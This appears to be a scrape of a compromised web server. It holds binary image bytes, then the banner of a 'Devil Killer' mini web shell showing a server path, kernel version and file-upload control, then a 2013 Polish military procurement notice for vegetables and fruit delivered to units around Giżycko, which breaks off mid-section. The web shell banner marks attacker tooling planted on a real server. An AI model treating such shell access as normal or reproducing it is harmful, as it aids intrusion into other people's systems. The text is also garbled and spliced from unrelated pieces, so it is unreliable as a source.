JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131121/477710-N-2013.html

<p class="kh_header"><b>Giżycko: DOSTAWA ZIEMNIAKÓW, WARZYW ORAZ OWOCÓW DO JEDNOSTEK WOJSKOWYCH I PRZEDSZKOLA WOJSKOWEGO BĘDĄCYCH NA ZAOPATRZENIU JEDNOSTKI WOJSKOWEJ 
NR 4352 W GIŻYCKU</b><br>
<b>Numer ogłoszenia: 477710 - 2013; data zamieszczenia: 21.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ZIEMNIAKÓW, WARZYW ORAZ OWOCÓW DO JEDNOSTEK WOJSKOWYCH I PRZEDSZKOLA WOJSKOWEGO BĘDĄCYCH NA ZAOPATRZENIU JEDNOSTKI WOJSKOWEJ 
NR 4352 W GIŻYCKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Sukcesywne dostarczanie ziemniaków, warzyw grupy I i II oraz owoców grupy I do Jednostek Wojskowych i Przedszkola wojskowego, będących na zaopatrzeniu Jednostki Wojskowej Nr 4352 w Giżycku w asortymencie i ilościach przedstawionych w pkt 3. 2.Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do siwz. 3.Zamawiający dopuszcza możliwość składania ofert częściowych na jedno lub dwa zadania. Każdy z Wykonawców może złożyć ofertę na wybrane przez siebie zadanie lub zadania: Zadanie nr 1 - dostawa ziemniaków i warzyw gr. I i II do magazynów jednostek wojskowych w: Bemowie Piskim, Orzyszu, Węgorzewie, Giżycku, Gołdapi oraz Przedszkolu wojskowym.
Lp. Nazwa produktu Jm Jednostka Wojskowa 4352 Giżycko,  ul. Nowowiejska 20 , 11-500  Giżycko Łączna ilość na 2014r. Magazyn Bemowo Magazyn Orzysz Magazyn Gołdap Przedszkole Bemowo Magazyn Węgorzewo Magazyn Giżycko	
1 Ziemniaki jadalne	kg	0	120	180	2 000	300	120	2 720
2 Ziemniaki wczesne	kg	0	30	45	0	100	30	205
3 Buraki ćwikłowe	kg	7 400	1 400	440	150	1 200	1 140	11 730
4 Marchew	kg	12 000	2 200	800	300	2 000	1 920	19 220
5 Pietruszka korzeniowa	kg	3 200	460	200	40	440	480	4 820
6 Seler korzeniowy	kg	3 400	460	260	150	600	480	5 350
7 Cebula	kg	10 000	1 500	500	70	1 400	1 100	14 570
8 Por	kg	4 000	380	160	120	520	460	5 640
9 Kapusta biała	kg	8 000	2 180	600	200	1 000	1 200	13 180
10 Kapusta czerwona	kg	3 000	700	160	60	500	360	4 780
11 Czarna rzepa	kg	800	60	40	0	40	200	1 140
12 Fasolka szparagowa	kg	200	60	200	40	400	80	980
13 Papryka słodka	kg	320	140	60	30	100	200	850
14 Pomidory	kg	2 000	780	120	100	480	540	4 020
15 Ogórki	kg	2 000	560	120	100	400	500	3 680
16 Sałata	kg	400	180	100	10	200	160	1 050
17 Brokuły	kg	100	48	40	30	100	100	418
18 Kapusta włoska	kg	1 600	100	100	0	200	60	2 060
19 Kapusta pekińska	kg	2 200	120	200	70	200	100	2 890
20 Kapusta brukselska	kg	200	200	40	0	100	40	580
21 Kalafior	kg	400	160	80	80	600	200	1 520
22 Rzodkiewka	kg	400	300	40	8	100	180	1 028
23 Natka pietruszki	kg	80	40	24	0	40	40	224
24 Koperek zielony	kg	100	40	24	0	40	48	252
25 Szczypiorek	kg	100	20	20	3	40	28	211
26 Czosnek	kg	80	32	32	0	80	20	244
27 Pieczarki	kg	1 200	108	160	30	400	180	2 078
Zadanie nr 2 - dostawa owoców gr. I do magazynów jednostek wojskowych w: Bemowie Piskim, Orzyszu, Węgorzewie, Giżycku, Gołdapi oraz Przedszkolu wojskowym.
Lp. Nazwa produktu Jm	 Jednostka Wojskowa 4352 Giżycko,  ul. Nowowiejska 20 , 11-500  Giżycko Łączna ilość na 2014r. Magazyn Bemowo Magazyn Orzysz Magazyn Gołdap Przedszkole Bemowo Magazyn Węgorzewo	Magazyn Giżycko	
1 Banany	kg	4 400	1 000	300	900	550	480	7 630
2 Cytryny	kg	1 000	160	100	30	120	60	1 470
3 Pomarańcze	kg	4 000	920	320	0	240	300	5 780
4 Mandarynki	kg	2 200	920	120	300	320	220	4 080
5 Grejfruty	kg	1 400	180	0	0	0	40	1 620
6 Kiwi	kg	1 040	40	40	0	100	0	1 220
7 Morele	kg	520	0	0	0	0	0	520
8 Brzoskwinie	kg	520	0	50	0	40	0	610
9 Winogrona	kg	520	12	40	0	40	0	612
10 Jabłka           Kg 22 000	3 400	1 600	1 000	2 000	2 000	32 000
11 Gruszki	kg	800	200	80	450	320	240	2 090
4.Warunki dostawy: a. Okres od 02.01.2014r. do 31.12.2014r.; nie dotyczy ziemniaków wczesnych dostarczanych w okresie 16.06.2014r. do 31.08.2014r., b. Częstotliwość dostaw: 1x w tygodniu: poniedziałek - czwartek godz. 8.00-14.00, piątek 8.00-12.00., 5. Dostawy przedmiotu zamówienia będą realizowane w asortymencie, ilościach i terminach wskazanych każdorazowo przez Zamawiającego w zamówieniu oraz w opakowaniach przewidzianych w umowie - pod rygorem odmowy przyjęcia dostawy i dokonania zapłaty., 6. Zamawiający zastrzega sobie możliwość, w formie pisemnej, zmniejszenia przyjętych w umowie ilości, wartości i częstotliwości dostaw, w sytuacjach, których Zamawiający nie mógł przewidzieć w chwili jej zawarcia np. restrukturyzacja sił zbrojnych, zmiany ilości żywionych żołnierzy. Wartością umowy będzie wówczas końcowa wartość faktycznie zrealizowanych dostaw. Zamawiający nie będzie ponosił ujemnych skutków spowodowanych zmniejszeniem ilości i wartości dostaw przewidzianych w umowie., 7. Zamawiający zastrzega sobie prawo do weryfikacji zgodności norm jakościowych dostarczanych produktów z jakością ustaloną w niniejszym rozdziale siwz. Prawo do kontroli tj. pobrania prób i badania dostarczonego towaru, w imieniu Zamawiającego, przysługuje właściwemu miejscowo dla Zamawiającego lub Odbiorcy, akredytowanemu laboratorium lub laboratorium spełniającego wymagania normy PN - EN ISOIEC 17025. Koszt pobrania prób i badania żywności poniesie Wykonawca w każdym przypadku, jeżeli ocena jakości dostarczonych towarów, dokonana przez laboratoria przywołane wyżej, okaże się niezgodna z normami jakościowymi i opisem przedmiotu zamówienia., 8. W szczególnie uzasadnionych przypadkach np. osiągania wyższych stanów gotowości bojowej, szkolenia rezerw osobowych, likwidacji klęsk żywiołowych, restrukturyzacji sił zbrojnych, kryzysu, zagrożenia lub wojny lub innych zadań postawionych Zamawiającemu przez organa władzy państwowej, Wykonawca zagwarantuje bezpłatny dowóz towaru oraz zwiększenie ilości i częstotliwości dostaw przy niezmienności wartości umowy do miejsc stacjonowania jednostek wojskowych oraz innych miejsc wskazanych przez Zamawiającego., 9. Warunki gwarancji i reklamacji:  a. W przypadku dostarczenia środków spożywczych z wadami jakościowymi:  Odbiorca może odmówić ich przyjęcia i żądać wymiany na wolne od wad w czasie 12h licząc od godziny 14:00 . Jeżeli termin wymiany przypada na dzień wolny od pracy, wymiany należy dokonać w terminie uzgodnionym  pomiędzy Wykonawcą a Odbiorcą.  Odbiorca  może odmówić ich przyjęcia i zrezygnować z wymiany na wolne od wad. Odbiorca sporządzi natychmiast protokół reklamacyjny, który wraz z kopią złożonego zapotrzebowania prześle w terminie 2 dni Zamawiającemu. Przesłany protokół reklamacyjny będzie podstawą naliczenia kar umownych przez Zamawiającego zgodnie z § 11 - Kary umowne.
b. Wykonawca zobowiązany jest dołączyć do dostawy środków spożywczych dostarczonych Odbiorcy dokumenty wysyłkowe, takie jak: dwie kopie specyfikacji wysyłkowej WZ oraz cztery egzemplarze kopii faktur , list przewozowy w przypadku dostaw obcym transportem, Deklarację zgodności środka spożywczego z szczegółowym opisem przedmiotu zamówienia, Oryginał faktury VAT Wykonawca dostarczy do siedziby Zamawiającego w nieprzekraczalnym terminie 3 dni od dnia dostawy., 10. Przedmiot zamówienia musi spełniać wymagania zawarte w następujących,  aktualnie obowiązujących aktach prawnych:
a. ustawy  z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia i innymi aktami wykonawczymi do tej ustawy,
b. ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych,
c. rozporządzenia WE nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych,
d. rozporządzenia WE nr 1935/2004 Parlamentu Europejskiego i Rady z dnia 27 października 2004 r. w sprawie materiałów i wyrobów przeznaczonych do kontaktu z żywnością oraz uchylającym dyrektywy 80/590/EWG i 89/109/EWG,
e. rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych,
f. rozporządzenia Ministra Zdrowia z dnia 25 lipca 2007 r. w sprawie sposobu znakowania żywności wartością odżywczą,
g. rozporządzenia WE nr 178/2002 Parlamentu Europejskiego i Rady z dnia 28 stycznia 2002 r. ustanawiające ogólne zasady i wymagania prawa żywnościowego powołujące Europejski Urząd ds. Bezpieczeństwa Żywności oraz ustanawiające procedury w zakresie bezpieczeństwa żywności,
11. Wykaz odbiorców: Zadanie nr 1- dostawa ziemniaków i warzyw gr. I i II  do n/w magazynów:
Lp. Zadanie Jednostka Wojskowa Miejsce dostaw
 1. JW. 4352 ul. Nowowiejska 20 11-500 Giżycko tel.87 4294705 fax.87 4294708 Magazyn żywnościowy na terenie JW. 3797 11-500 Giżycko ul. Al. Wojska Polskiego 1 tel.87 4294801
Magazyn żywnościowy na terenie JW. 2098 Bemowo Piskie 12-230 Biała Piska
ul. Kętrzyńskiego 1 tel.87 4372134 Magazyn żywnościowy na terenie JW. 2568
11-601 Węgorzewo ul. Bema 7  tel.87 4295311 Magazyn żywnościowy na terenie JW. 1460 Orzysz
12-250, Orzysz ul. Wojska Polskiego 33  tel.87 4371513 Magazyn żywnościowy na terenie Przedszkola wojskowego w Bemowie Piskim 12-230 Biała Piska ul. Przedszkolaków 193 - Bemowo Piskie tel.87 4372182 lub 180 Magazyn żywnościowy na terenie JW. 4808 19-500, Gołdap ul. Partyzantów 33  tel.87 6156427 Zadanie nr 2 - dostawa owoców gr. I do n/w magazynów:
Lp. Zadanie  Jednostka Wojskowa Miejsce dostaw  JW. 4352 ul. Nowowiejska 20 11-500 Giżycko tel.87 4294705 fax.87 4294708 Magazyn żywnościowy na terenie JW. 3797 11-500 Giżycko ul. Al. Wojska Polskiego 1 tel.87 4294801 Magazyn żywnościowy na terenie JW. 2098 Bemowo Piskie 12-230 Biała Piska ul. Kętrzyńskiego 1 tel.87 4372134 Magazyn żywnościowy na terenie JW. 2568 11-601 Węgorzewo ul. Bema 7  tel.87 4295311 Magazyn żywnościowy na terenie JW. 1460 Orzysz 12-250, Orzysz ul. Wojska Polskiego 33  tel.87 4371513 Magazyn żywnościowy na terenie 
Przedszkola wojskowego 12-230 Biała Piska ul. Przedszkolaków 193 - Bemowo Piskie tel.87 4372182 lub 180 Magazyn żywnościowy na terenie JW. 4808 19-500, Gołdap ul. Partyzantów 33  tel.87 6156427, 12. Wymagania stawiane Wykonawcy: a. Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie umowy, b. Wykonawca odpowiedzialny jest za jakość dostaw, zgodność z wymaganiami jakościowymi określonymi dla przedmiotu umowy,
c. Wymagana jest należyta staranność pryz realizacji umowy, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszej umowy, d. Wykonawca dostarczy przedmiot umowy własnym transportem, na własny koszt i ryzyko, e. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadnianie będą wyłącznie przez ustanowionych przedstawicieli Zamawiającego i Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.21.21.00-1, 03.22.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy pzp.
1.1.Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości: Zadanie I - 4 000,00 zł. Zadanie II - 3 000,00 zł. 
UWAGA: W przypadku składania ofert na więcej niż jedno zadanie Wykonawca musi wykazać, że wniósł wadium w kwocie nie mniejszej niż łączna wartość wymagana na potwierdzenie dla tych części zamówienia, na które Wykonawca składa ofertę.
1.2 Wadium musi być wniesione przed upływem terminu składania ofert.
1.3 Wadium może być wnoszone w jednej lub w kilku następujących formach: pieniądzu; poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;gwarancjach bankowych;gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. Nr 109, poz. 1158, z późn. zm. 
Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego prowadzony przez: NBP OO Olsztyn 51 1010 1397 0020 1713 9120 1000 z dopiskiem wadium post. nr 120 2013 - Dostawa ziemniaków i warzyw oraz owoców do Jednostek Wojskowych i Przedszkola wojskowego
2.Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem, 3.Zwrot i zatrzymanie wadium. 
3.1.Zamawiający zwraca niezwłocznie wadium, jeżeli:
3.1.1.	dokona wyboru oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a ustawy pzp;
3.1.2.	unieważni postępowanie o udzielenie zamówienia.
4.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
5.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.6.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictwa, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.7.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
7.1.odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
7.2.zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli złoży obowiązującą decyzję administracyjną właściwego organu Państwowej Inspekcji Sanitarnej w sprawie zatwierdzania, warunkowego zatwierdzania, przedłużania warunkowego zatwierdzania zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia niezwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust. 1 pkt 2 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. z 2010 r., Nr 136, poz. 914 ze zm. lub zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej Dz. U. z 2007 r. Nr 106, poz. 730</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna, iż wykonawca dysponuje niezbędną wiedzą i doświadczeniem  do wykonywania zamówienia, jeżeli złoży oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna, iż wykonawca dysponuje niezbędnym potencjałem technicznym  i osobami zdolnymi do wykonywania zamówienia, jeżeli złoży oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna, iż wykonawca dysponuje niezbędnym potencjałem technicznym  i osobami zdolnymi do wykonywania zamówienia, jeżeli złoży oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna, iż wykonawca dysponuje niezbędnym potencjałem technicznym  i osobami zdolnymi do wykonywania zamówienia, jeżeli złoży oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
